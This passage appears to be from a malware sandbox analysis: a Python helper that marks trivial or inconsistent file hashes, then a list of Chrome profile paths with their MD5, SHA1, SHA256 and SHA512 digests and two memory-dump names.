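def parse_record(text):
    """Parse one 'path / blank / MD5 .. / SHA1 .. / ...' record as the report prints it.
    A record cut short (missing digest lines) still parses; absent digests are just absent."""
    lines = [l.strip() for l in text.strip().splitlines() if l.strip()]
    path, hashes = lines[0], {}
    for line in lines[1:]:
        algo, _, value = line.partition(" ")
        if algo.lower() in ALGOS and value:
            hashes[algo.lower()] = value.strip().lower()
    return path, hashes


def classify(hashes):
    """('trivial', what), ('inconsistent', detail) or ('content', None)."""
    present = [a for a in ALGOS if a in hashes]
    for content, what in KNOWN_TRIVIAL.items():
        expected = digests(content)
        matching = [a for a in present if hashes[a] == expected[a]]
        if not matching:
            continue
        if len(matching) == len(present):
            return "trivial", what
        # Some digests say "trivial" and others do not: they cannot describe the same bytes.
        others = [a for a in present if a not in matching]
        return "inconsistent", f"{','.join(matching)} match {what!r}, {','.join(others)} do not"
    return "content", None


def triage(records):
    """Return [(path, verdict, detail)] for a list of record texts."""
    out = []
    for text in records:
        path, hashes = parse_record(text)
        verdict, detail = classify(hashes)
        out.append((path, verdict, detail))
    return out


# Records copied from the Files list
CRASHPAD_PIPE = r"""\??\pipe\crashpad_3140_OENMXFHLMWOEDRLI

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""
SCT_PENDING = r"""C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
"""
# The last record in the list, which the report shows without its SHA512 line
TRUNCATED = r"""C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\89b7725c-c0ba-439e-8fc1-75b74d50ad7d.tmp

MD5 51aa61b534df048e5a36733fa96f2bbe
SHA1 2bb493bb36a23e19572525983848e846ac34fbf9
SHA256 31e2e44bc4d5d1550586c6f542f8db947dfad52f0c2df58603dad9671c162ec5
"""
# Constructed, not from the report: the MD5 of an empty file pasted next to the SHA256 of "[]"
MISMATCHED = r"""constructed\mismatch.txt

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
"""

if __name__ == "__main__":
    for path, verdict, detail in triage([CRASHPAD_PIPE, SCT_PENDING, TRUNCATED, MISMATCHED]):
        print(f"{verdict:12} {path}  {detail or ''}")
```

Run the same filter over the whole list before exporting hashes: the remaining Chrome profile files (Preferences, Local State, the LevelDB logs) are real content but are the browser's own state, so even after trivial-content filtering only files written by the dropped executable belong in an indicator set.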

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 c88e5d9e1541984437dd3700b8d8be78
SHA1 3566c9fbc3e79f557ba78b79af9b5a4ed5c8eef4
SHA256 843adbc7b11bdc2503206c64fd5c364309fb1879088c14d003c4750a61b33a24
SHA512 425ebf738beca1082ab20b0d97407589e26998bf40b6a58f24c9bc2c477adf2b3133fe79a7e54292232829a7be0ba34a85c249cc7649ed604a597eaf3cd6658f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 40fc3c871378d84b577bd616005d803d
SHA1 f3b49159571fe90bd278fb949704537ce98a7d7e
SHA256 ab83b09c2cf2e94b0b517d835d882eac8be78ed79dcd00409ead35841bb4afcf
SHA512 caa4e224b4fd73efc5a7e18c8dd1b56264884c43d3aa7e98b8b5c22decd88a27e0f4b30b68488d64d4e5cfc4b2aff8e2178c45644dfdc6ae0fa2141002b88fd6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 ff09fc7d1b8cc74a4fc081a7c3232b2b
SHA1 acd4acc6a00fc2cdacf0f35430c470c7df77dca5
SHA256 b32bda6ded30a413692c4c505f29852f8d72121e3b3255f44d7de3150fad1ec8
SHA512 90e3835f938b85de2e50f81dc8a4a1b277cd87428d3f4ad5179b5d6e9459221db19313349a4bb808f3c28a487dd848bd7a312bd8e0f232bd6b2b7bc0af45b1e1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 4c72725266187cd8c3a38de44e306c9f
SHA1 080a5391bd924777c787fa72aba5dfc1317db2b8
SHA256 0d3e94496d7e6ae3d098e3c7c0c0b4b953b773c72ef6a247316cff3026166697
SHA512 7a90a1ef1a9a80a9a5ef2a28a21a8b568e8fd9e26dfd23108260d4399da28e8e126794541169e2398fe2d4284ac3c53a9e5891763f26d7bc26c5c476e5c4f1ca

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 e91ee655fc370fc76cae70be75eb4da7
SHA1 b1c2a36a252373b78768ff0b8c7c414975f8230d
SHA256 2119db0210675f0217218459520534d0442fb93f8d2ad66ba4b20c8d2a430ac2
SHA512 6295ce62fc97be1ee529b0c4dde9d8b806e7972d89378d527740c3865bae85e089883634ad2c3a72b0f0c63f0a0758645733e9e8d9092fb87bd7cc3e95d6c7f1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

MD5 961e3604f228b0d10541ebf921500c86
SHA1 6e00570d9f78d9cfebe67d4da5efe546543949a7
SHA256 f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
SHA512 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

MD5 ef48733031b712ca7027624fff3ab208
SHA1 da4f3812e6afc4b90d2185f4709dfbb6b47714fa
SHA256 c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99
SHA512 ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG

MD5 916fb37e0663b788b2dc177ffa3b3a55
SHA1 537f556fd6580324aa6af1fc0d08f1d9a6eaf81b
SHA256 11f850160676d478950e9b3593e7471699e14ee1633e7ec90f67e8d22ed577bc
SHA512 2a4a8bd2ea449fc76dbce280f1825330945e75a25ca45f2c4829e358a8255f82f3e84db68975a2e95b663c5ceeb7a1b8d4d5db9bb211284a0243dce14d01c403

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL

MD5 53826ac60774da8ab420dfb652dcb153
SHA1 34a5e789f5d407d00b56bfa691aa4aaafc192b54
SHA256 ce6b23d61cf760c2fcac1e6b8e5b70cfc2e10c2715e8f9e2407edc3c75a01f7d
SHA512 93b7483b5fdaa2ab9b39613db7abfce9f3938d9994ced65a43eeb29b7ff44a372a4cbf091667ca3255bc350bf973acd315e5aad8e41790aa252748d416a80123

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

MD5 4d8b3bf7d9c42e7b25b5f5644dbdf920
SHA1 0f932897bad61c938849dc8df889a11dce9160e0
SHA256 0f65557fee09274ecb0f3f2155fdbd289db4b815cf64449e229741726c9005a1
SHA512 4ba78a50d252d1c68ba2c3a35af65e0c9adfc581193b925c0d5c5335a128623e4a87c07e11af723c289cb17bd17a2273e35ddbfc635e8441fb484bce06322249

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13373930710838382

MD5 54b43e5316efcb504a7f25c8b80e1671
SHA1 3ee9674728ef25057b7603a4e5354de3c6dab733
SHA256 36616e1c34f8b896eced66c4d27c221521a34c1a303cd9c89af89ba5dfab6315
SHA512 4ed4c40ba1954ce1e31b968fda9ba76afc4ee0f5fd533ab95d4a47e0fb037bdff5156044119eb0dd2f327d810f0d7df5b11459fa026a44c0f049d1f597173800

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log

MD5 eae4516dcef465a24607a9b5a3144fc0
SHA1 42bdce307158b6a70d4e41d136b1c5865422db2b
SHA256 1415cbc56c878c82e9825d7421223e78717202f63bd98819eb91daab042e0b55
SHA512 a3e1a5ed2f2b6bf3bd71cbe35061a4b7aa0062e3e487863abdfee76d86782aaa26fcf17c3231dcf99ddcd370450f06bf2d332650cd528e265af59c040cdae5b0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG

MD5 db7be30e1fc440e6c8c06071a1c85fab
SHA1 ac74ed586af9c044467472d087ba14eaa3c6b2ef
SHA256 4348ef7c2769302a7cfdfe6acbed859c855879667ea25e6bd34fa6cb3fc89a4a
SHA512 a7b63fca654c62198fba16d9e9818c31c96e86fb48a0aa6e5364ed9f57cac286d0f702824da9ec64220192e0a751daa745a10a0f8967dfb2d5f3c759101e381a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG

MD5 6f2809522b67127214f29f176486322e
SHA1 c021b8fcfa40fb837ab9162d9f3b9619ca40d5fc
SHA256 3c1855d1630c7db246ada37fe2226d26ee56fae99b514cd82c37b286bb414e25
SHA512 03c067c4875c72a097384aac44fec7b675abd1ea07f6c654e719b03a82e7125b2e2c710fb69757e2b65724df9f550e99d0c79b451e0fedf9aa268d1116a9dd2c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2

MD5 6c0d0b4aca0aa4a3cfcef60e2b35e643
SHA1 2593bd7a9538a78111fbc9418ed733e8b4f76629
SHA256 bf363ec5ac05886d98c6c9015b7b2331899b6ae1dec2083a1d78d41dc591a865
SHA512 6979f56ef023fb0d3dd9a4fdf707829882297d04de2acc4e2ee9180a5f16ac5708dbdd64993f8d35bbc5cba08812711fca7e559bea5c1f4e3015e33f2298bc83

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1

MD5 7cc634082be7688a7eb31ff1d226ce79
SHA1 79239c9542fbf916e3e33f551e887a64db997439
SHA256 105b9717e719a5c5abd30dd4e0e67efcef4fd01083bbc24e30c49080b763ef5c
SHA512 8840e07c1b4af29ffd4c50f0eb29a35bb2c2243f08bd2503d47fd9ba25c45bf68ed9062c087d919c7ed5af21619cac7e6c52373e930c231c836ac3261139a951

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

MD5 fbf98853ebd14b1e12df2135310ab839
SHA1 1be81a67bda4ba5f2d2b626d5d061986ff94160c
SHA256 47f3d7f3dec1b3dd64068f0a87c33410c895068de7a3d356b6bfa734b8813240
SHA512 9228f7a8c97bb74d652bdb0ec23e6ac7f859d51efde1671abc9e282a2c1e7791a8e969239b400ac20b2f6f3e70c7af4e26b4b8ef6fd466b1554fa1298bc7b9ba

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG

MD5 7de3800af76e84461b34195ad484da08
SHA1 06806a53cc701039201c62c8ec8f08f990a35218
SHA256 6d4b3cfedb11ae8822935d4be498828d57c6c1e2350de077258f0524e72c88fc
SHA512 5cd8dc729a719955b60729cddf59af3122018672dd2377b496d762582c61eff476d6f6254f6bd0733fa13314993a983fa2bea0f853c9e60d20c0a1ac93649751

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

MD5 87e150ac07b8c2151e038afacfce0d3c
SHA1 5033fd042296cf1c3e6e40a39ba34355858cbe82
SHA256 da491fafbf84f8b2e7552459a8da2f392effda03ff28442efb6418691017d87b
SHA512 406ff08e06776a0a217b868aaa0ed53b931a20cb75ac5286189ec9ce066f8e46092f9e6f906aff6184b6975f267d57c55f919396dee632bf88f131a66439d28e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG

MD5 3dfbf8c1bad21b3c5c89104d1a639ceb
SHA1 d7913c62d4113d17a164845ed7c8cfea427193be
SHA256 c297283526c918971e2078de88a58856a5f613338faf2eb80f7b353a84ab24cd
SHA512 af9ae19c84fa5fd9c53e15be3908fc9d8f50c23a8e87af3fedbe36dd4022dd5574db6bd4169943dfe82cd75949f12065ff3452b1924ae26e6ecc952c425c35af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

MD5 e257e4e0328cc00b67168d5055fd0e96
SHA1 3ff9d3e493f60f96abc9af648b519504abdfc123
SHA256 df57c3c87836128e9c226a74ce2d01633c37691db2128bc30b18860f772c72d2
SHA512 5bd798adebe05207de79628465eca778f6ee912f26cd94fc577e50d807b6218622c7318e1d0496613015fdc3604b209087f60959380a56750c3eaa7ee2983365

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3

MD5 03caa06bc261d4d51f7cc650481d231f
SHA1 063afa8ba0bfaa1880af8420feb6604cd5860a8b
SHA256 a3c6c3ba385a906100d0b00be9477ca0889cfe5d3450ae99c0fb204e177700db
SHA512 04e83405a385e5177d54a129c7eb47f789978fc8e30b4c67a3ba3b1b08a1ce991d720e9634bc9377c81762c30677b97aa5acfdb7d602ee59656ceef8b8b2ccaa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

MD5 f1c75ea2173ffb8be3ed8e7eecbf1d19
SHA1 c124b66560d9cdbbcf33ef6e88a6e5354aa7629f
SHA256 3126fcc8a06fb694aacbe04aac610b065c1de1b732e4f8e3d1caabb5f32e8c08
SHA512 6099acd2ff61ff10b919d8bb07958f74563ea72f1dbf6d2f2659e50a721ae6ee0414f4030a6d702694d519cc3bc4fd6b06ef299e53e54f38264370a187c313a6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

MD5 fcffd8c6587b2591c8d2c0d9cdaf6626
SHA1 8a712cf13f2ed1111d91c1492f33cc1b3b381ab7
SHA256 8698de572f33a62d2654141c6c579e5c41c1a683dc251ecfbcbb999076f093d8
SHA512 2836f0423c0be64ee785c9656b598618bcd367ccf1103f3d17ab9f4ad4e433587a7fcb311f42be222af0ad23cb79d1d008bb72473472e0b4f6861ac7d1f01141

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG

MD5 e23e5efb50355a14436c650c46ce53d0
SHA1 9227288a32a6bcbd7d40d0ff0f1f45cbc89a82df
SHA256 4faee20227b82991345d52657a62a229d5ae82b02204d6a2374a7d5b0a640e6a
SHA512 1ae6179da316f5797df3edab8a074412203ba91aece338d9e2084a12580749121c84162efab927bdea5084a2893948ddac365d69e733250b46e338bcaae23ff7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

MD5 47d3290190cf8945c5a3496c79f8ec10
SHA1 db1d59b350938130b75e4a21139a6f2e6124e340
SHA256 d93a945d1d6bb4c81d686a0dffe226dd971fcbaca43ce19f640b3057e9226d65
SHA512 dc8dbc69301b274f217b633edf14d929f998905abbaca862abd69a03e9275d0b89d97a68630691a6374140cbdfde18b4a62ac581594195299208ba737125d018

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG

MD5 1fc0aa65525ee952a3d2f7b58a1e6139
SHA1 2280d497557b19321bae43b69e5d3da1580a3e76
SHA256 0b2d28dd4d6aedce8254eae83ebda4c1ab8a1e370126070dfa17a838155b6315
SHA512 017b6aaecce41cbd53722d60c80b1126acda199a9376fe1be3d69d90226f0b24a485c4ec7d1412bbaf8bf641e03866a14dfce34357a931945a82bb0ab43f15eb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager-journal

MD5 4d3b2251ea969c6a95f738aa61c10a82
SHA1 25afb293f03f29c2c00da7b9d418456ad0e4307d
SHA256 bee2e5ceaac3e32ccbe379731bf4c7dd19e8abb8b93dc4b97b409e777ce76229
SHA512 42f1a6b132d6b0c88191adb96996f0be5cb3494390134a0a6be084099ccbffc88e0944a40ab864ba3ab0dba73194f178995ebc888faf36cede58eb9975ca1994

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager

MD5 174f11aba41109f9f8ea7f0246a8e8e4
SHA1 cc152a1aa3efda8c43e5c0628a745e96579845be
SHA256 689ff2e0ddbcda2d7214948c448eab3de4ecea715e73390a9981a27d56cb09ed
SHA512 f26b814a2e77771b0578f837492cce5003ca30530865d84ad62aabb697dee6df4d9d4d4768040cf0feef536e15523e2aea6ea9c8228139e410649b4b6b9df04e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG

MD5 6ba9b02f7fdb5e63a3535fb4c684f480
SHA1 c066a82ea9682057aac40ee1f2cf45cc05efda11
SHA256 f37161f8a504ff94abd8dc343658333e3c0b8df19e1e752dd8fecf82c26e53c6
SHA512 b3e90a5888203d3069dfd07a369db91f861b6428ef4530c35ec5a7da419ed07a3d5c402d26c7935e068e2dab529a0a86ed3922198fa7bf31a9066ca8fe968997

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2

MD5 38cb2cc1cf95b83afa130913ab917f4b
SHA1 a709328b8abdec235a56dc4a1820cf6143a9286c
SHA256 40deaf6d8f2496d99e2e1465b7fa75a0114b345cbe1121e6c8226bedd4562d3a
SHA512 5695009f839194936f6c6c68da514226ff9eefaa95ef86b02b53cb24459c78dee4525faa72b4b6151d82d6ecf12468a461a1716901b3285194a4cd9cb9f9cae5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 db21498dec053b7e38e2d9dcf8c158ab
SHA1 e1e8e1ffe969719afffb8d1648fbad664412f38e
SHA256 9c66c2bb06f5e5104959a044d7e66fe2694ae75926a0b1acbbdf989a424d3a1d
SHA512 8733f63a1dc67d5cb6f6a8eb935ed848f282285cb287a5c1c32639366496cd2f4ff948dd28dcf48a04d75e84c0cf01472b04c0957f2f6183a488ede02924fde8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0

MD5 441631eafaf767dfb3e510cd87d2b9fb
SHA1 27e9e186bcf1878e82109cbb0f3218403dd36eff
SHA256 a2e1d6fffece7d0cbec25c766bad66204e56de5e05a61586612cac901292845d
SHA512 c5c5fb93396fc27414514b5381e8febc8c70a5f583551df32643ba846166c4107712a5d3b8cc3b250c0cf29b13d23dd99781174e7af9f1d70d6a0d5e1c93fe40

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13373930707386382

MD5 009e3c489cea7a2352cca1b182213cce
SHA1 dfc7a11359488c8d5d8164515c2a22054ebd295c
SHA256 18250f6ee2c0d5f1fbd8ef913caea1b0498e0ede24b323599bdeb965a4e9f09c
SHA512 4b050071ceb2ba8bb89919b4b29fb5872c8f080feb44c4e808daf1ca36126fe312da21a8ea11e81ffec7ab2cd25ae87cbf67d801d0b5035ed08c9428ec306a5c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DIPS

MD5 a5db13e18bfda1203a0eb97cb93aad9e
SHA1 fe6b4e0b52c12b86b1f2d0a977851ba3a68187ce
SHA256 47966cba7f4ba78dfca2e4f5ddf87bd527d914b60dce05aed9c9af99c41be8ff
SHA512 3d11d4845d4adf451e83cacb3e50ed338b9adaaa4b6e4cec5175603580785021ffcb5d51d999c21ec30f6087322ccdb02a6e4a655a47afcdbfa52bd766dfb800

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Browser

MD5 de9ef0c5bcc012a3a1131988dee272d8
SHA1 fa9ccbdc969ac9e1474fce773234b28d50951cd8
SHA256 3615498fbef408a96bf30e01c318dac2d5451b054998119080e7faac5995f590
SHA512 cea946ebeadfe6be65e33edff6c68953a84ec2e2410884e12f406cac1e6c8a0793180433a7ef7ce097b24ea78a1fdbb4e3b3d9cdf1a827ab6ff5605da3691724

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG

MD5 62746cbf0983bcb8959d5f89e0515d25
SHA1 c2f40498462e8ad9c3bf9f2df51f34185d4834ce
SHA256 7a7f84b15e1107ef73a0e4117b6562540aa4d994008c21648ef71cb9649c9753
SHA512 0b65cad4a581a8e225361b7a66065bcb987fa878045f81388a91f3ab8a3b2cc0a1b61ca255c5aa86ca17192ac53eced0923777badfa25b4229bb7fa5096a000b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\first_party_sets.db

MD5 5a1706ef2fb06594e5ec3a3f15fb89e2
SHA1 983042bba239018b3dced4b56491a90d38ba084a
SHA256 87d62d8837ef9e6ab288f75f207ffa761e90a626a115a0b811ae6357bb7a59dd
SHA512 c56a8b94d62b12af6bd86f392faa7c3b9f257bd2fad69c5fa2d5e6345640fe4576fac629ed070b65ebce237759d30da0c0a62a8a21a0b5ef6b09581d91d0aa16

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\first_party_sets.db-journal

MD5 fa0b222c8b763669ecb5bbec98c5be92
SHA1 3c4fbeeb6d7d5b260000927ccdb1fa033d218bb4
SHA256 439fd048595f7017f1e0ad3e7adae226957bdc106fb74560ec3bca9549d1ca92
SHA512 4afe0f20d1a8bc08e0e527ae9dd793b5a92a446880dae18b0ea9cc3f4a7dbccadcec664088b6018242d62ac4ce19ec81edaeedeb530339b3e57d104b932cbff6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 ff4dcbbfa275e5bca66842a7c6072b23
SHA1 2a5e86153804acb08cf116494530b43db26053c9
SHA256 6b284d987f5f273ce53bf70266cf0359b33b17aa5e10abe7a985d5809c381be0
SHA512 35ebde25b27e3e3d84de9f2d558833765d9d297794c65eef85b51fb5992a23f6ba3a11e45f0962c5fb550e1eb76bd6af76b0d0ba8cef8aec5c64438e944680ef

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 16b4751f940acd44b83b32f8a0f51216
SHA1 c7668775a5bf8d71ae96f654d74cc26b3f35e46d
SHA256 4a5ab708b0396aa399005a6fd7c8da5619b47391592e5a0d6af260c9256f2f6f
SHA512 a7bdfe4c1b4df350c56b1a02d9c7af8828d57a128be920b1d98c72a744dd1ab34b437f49eb583b9c519766897eb6abe6487a671dc5b66b276e89212ad47463f7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 0dabdf1eb95b656caa59920dbae53fbe
SHA1 b4ee989c368bc35c82e53b012f824c41f528cc35
SHA256 a520f44b6f9bd177908145bd931b63773bef94221e58e5782ce3aad5b1c9bb82
SHA512 283835b8c58aaae4fa66b18a0f2e3d27f35c22f371bf24138f3faa5818ce794971ccd490a35db9367e5432eaa388d4d0c71c0b96a7ee3d882bc2b45fd9f65183

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 cd1a1d597744361438feb00abadc807b
SHA1 ece680bc8ec19e12617f1cd4c5d1f8402447c58d
SHA256 3cc6eb118774a993249b9fd77a416a62a99b5c2c04d0e6c51c1dd0f8b5a72c27
SHA512 767443d2ecd0ccc09f136c48298254c336f1f21bed1d409dccae174cd2c1cbfa50f723fcd757e6f4ac17f6b99cd9224e5e54ce9195c596b0a0bf8b64117507bf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DIPS-journal

MD5 5fcc11c9028559309cbcb9841df7e5f0
SHA1 a0d551d2e47c12fc6510703886d699405a9b2067
SHA256 f81075983d72f729b0e16421bfc2420e288988b447c506aab0eb613c9e5b4fae
SHA512 4298e5c01d62ff48a8a581415fa81e9553580a54ab18faf868b3766ba8e9b7bfa99b874a775b7fd0a075620db4b36e6bf6bb0ec07e19edde98b157c43d1014b0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 856b393b662f8e6201bc34e5b87b88a6
SHA1 3570988df34edefb213fa8a0444784a9b0c9d338
SHA256 e4c733826b04ae5a190de3c8aab29255a0dac221648a65bf6d4e714eea3cc5b6
SHA512 d79a9f51744af77fc992f5e63bbf84762c726efbeba29ad379747685743141224eb72dbcb3fc562195e93c73c7f625047de42fc233caf4bea42189b73ad9e475

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\89b7725c-c0ba-439e-8fc1-75b74d50ad7d.tmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

memory/4980-602-0x0000000000400000-0x000000000132F000-memory.dmp

memory/4980-616-0x0000000000400000-0x000000000132F000-memory.dmp